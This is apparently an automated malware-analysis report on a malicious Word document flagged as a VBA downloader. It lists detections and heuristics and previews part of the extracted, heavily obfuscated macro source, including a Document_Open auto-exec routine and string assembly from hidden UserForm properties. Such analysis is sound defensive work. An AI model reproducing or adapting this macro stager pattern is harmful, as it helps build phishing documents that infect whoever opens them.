MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro and a UserForm hidden-property command stager, indicating an attempt to automatically execute code. The presence of CreateObject and GetObject calls further suggests the execution of arbitrary code. The ClamAV detection 'Doc.Malware.Sagent-7465819-0' strongly suggests malicious intent, likely to download and execute a second-stage payload.
Heuristics 8
- ClamAV: Doc.Malware.Sagent-7465819-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-7465819-0
- VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13619 bytes |

SHA-256: ef82a412e71771d0b42798f85a1cda1bfc3f5b069c3adb268214838f45d953aa

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Hwdqqnkqpz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Cgyzxgey, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Kebnuaksgipk = "Vicki"
Dim Lasgrersqb As Integer
Dim Lpphjqiu As String
Mtinnyiympbde = ("Natalie")
Dim Vhhdroavt As Double
Dim Czzyctumozxd As Boolean
Dim Jrobzilycnja As Double
Klxpytvjyonhj = Fydrjhwm
Dim Giewlpccwccb As Boolean
Wxasaoryu = ("Quia.")
Dim Pgjhpnzdvrkrn As String
Dim Kfnoaeqxulhdl As Double
Dim Hoizwjsu As Integer
Cymolgnfbdm = "Qui labore molestias voluptatem."
Dim Utzipvikn As Boolean
Dim Jwinqpslgaxf As String
Dim Ifuxkbpwio As Integer
Adyxepasepxzp = ("Expedita et voluptas qui quas placeat quia odit amet quisquam.")
Dim Aeewnvyhqo As String
Wdnntgtp = 548
Jwifkeshui = Orestbcwijr
Prbdsvww = 832
Jzqccfajqqfn
Vrzbwjspq = "Architecto ab molestiae quam."
Dim Nfcckvxyfjmw As String
Dim Cdfsgnnba As String
Xdvhjyxzvjw = ("Patty")
Dim Ailsjwiu As Double
Dim Tfnwkmelejnms As Double
Dim Vkpxiugfdsx As Boolean
Sekvdgcbwcmnr = Oonqjbnltxmc
Dim Jdnlitaz As Boolean
Lapzicjqwo = ("Laudantium incidunt voluptatem aut quia deleniti.")
Dim Fgsuesqxqdo As String
Dim Yzcjfrpwdf As Double
Dim Ndrnvgzjvx As Boolean
Noiiutilpnjc = "Non eaque dolore."
Dim Qxbrcbijq As Boolean
Dim Kuxpqrbrjvqjg As Double
Dim Wxvaupfopc As Boolean
Vgjexskj = ("Error aut.")
Dim Wywikymaou As Integer
Elnqujfginhm = 964
Zqtqwtllbw = Egcpnopdby
Xadrcjrjc = 976
End Sub
Attribute VB_Name = "Oxsxunkzok"
Attribute VB_Base = "0{D3CE7CE8-882C-4BFA-8CDB-3B4D46627047}{2654A822-EA56-4C1F-86B2-D6A2805DC7D9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Xjtlfhjulbv"
Function Obhqsekfagdc()
Cmlkneyqyilb = "Vickie"
Dim Uqlhlvgm As String
Dim Aalceebgua As String
Jtpxvonz = ("Nihil blanditiis dolor et nobis voluptatibus quidem blanditiis est.")
Dim Zipukrcs As Double
Dim Wbjmswmtgeh As Boolean
Dim Thrsnzszqsw As Boolean
Mjujebnw = Jcfycttnw
Dim Wmszotuqgjnm As String
Czxafatpai = ("Est.")
Dim Bqfxeapkqx As String
Dim Pisgxxwqpp As Double
Dim Vmqkzgmjifre As Integer
Enxesexmkx = "Inventore."
Dim Rcmatlqkbr As String
Dim Ljlsbjqo As String
Dim Sjskwuxjctd As Double
Jximgoaimds = ("Odio non ut dolores.")
Dim Tekagtrcj As String
Iovmrppby = 816
Utxkzvgg = Qobszbmj
Aubdrtnqxor = 553
Edjnjzqkw = Hwdqqnkqpz.Cgyzxgey
Horagids = "Ad in non."
Dim Iombmlcqwpqmi As Double
Dim Xwormhcabfyo As Boolean
Pthvmbba = ("Blanditiis id similique quod et voluptate numquam quaerat.")
Dim Ecmatlvgdii As Boolean
Dim Adrfnlvnwhq As Boolean
Dim Irvmpwuxnkubh As Boolean
Sklrdehrvw = Gdhuwuwddlr
Dim Rqntwdfvlv As Integer
Ydrbaapbhotgp = ("Eos error quasi ut deleniti corrupti architecto.")
Dim Llggtsfln As Double
Dim Ysitvivyxrfcd As String
Dim Qedwhdxw As Boolean
Eosdssdhcb = "Facere dolore et tempore."
Dim Nslkrbqfjcvs As Integer
Dim Hqmubwnj As Integer
Dim Dufzbubjexrk As Double
Lwgpabszbrkmu = ("Daisy")
Dim Agdcqhxv As Double
Pbmnejwf = 820
Eqyjpbdsn = Ztjeqoiupoa
Kaglxhnhez = 398
Mcrjjyhrt = Edjnjzqkw + Oxsxunkzok.Twitukoytgnx + Oxsxunkzok.Otnntprduj + Oxsxunkzok.Ixvljmxhafr
Spmtbiroxknax = "Dolores tenetur nam."
Dim Aqlmbdnldmgto As Double
Dim Wdrabvwiz As Boolean
Asgrzvsp = ("Animi cum reprehenderit sunt possimus.")
Dim Bfcuedigupcts As Integer
Dim Jwkeehlmxd As Integer
Dim Mnlbzliux As String
Wrncfkbgz = Qyhkeopse
Dim Ywtjochjtm As String
Omqfgcwwvng = ("A facere fugiat beatae reprehenderit velit consequatur vel et dolorum.")
Dim Toguefkpnt As Integer
Dim Vvyyqztvit As Double
Dim Jjphumkpwwu As Integer
Pohkaasz = "Eos qui libero."
Dim Gyxfombeaq As String
Dim Vpcuajbmya As String
Dim Blmlhsfomyjjw As String
Dv
... (truncated)